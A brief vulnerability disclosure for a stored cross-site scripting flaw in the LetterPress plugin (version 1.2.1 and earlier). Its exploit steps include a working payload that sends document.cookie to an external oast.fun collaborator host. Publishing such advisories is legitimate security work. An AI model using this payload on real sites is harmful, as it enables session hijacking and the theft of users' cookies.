/LetterPress-1.2.1-Cookie-Stealing-Vulnerability

In LetterPress plugin <= 1.2.1 is vulnerable to Cookie Stealing Vulnerability. An attacker can able to steal the cookies by injecting the JavaScript code.

GNU General Public License v3.0GPL-3.0

Exploit Title: LetterPress <= 1.2.1 - Cookie Stealing Vulnerability

Exploit Author: P.L.Sanu

CVE:

CVSS:

References:

Description:

In LetterPress plugin <= 1.2.1 is vulnerable to Cookie Stealing Vulnerability. An attacker can able to steal the cookies by injecting the JavaScript code.

Exploit:

  1. In LetterPress plugin navigate to Add Campaign and insert the code "<img src=x onerror="location.href='https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c='+ document.cookie">" in HTML Campaign Message input field and click on Save Campaign.
  2. View the campaign and monitor the requests & responses in 3rd party site (Ex: burpcollaborator)
  3. The cookies values are passed in the GET parameter of 3rd party site.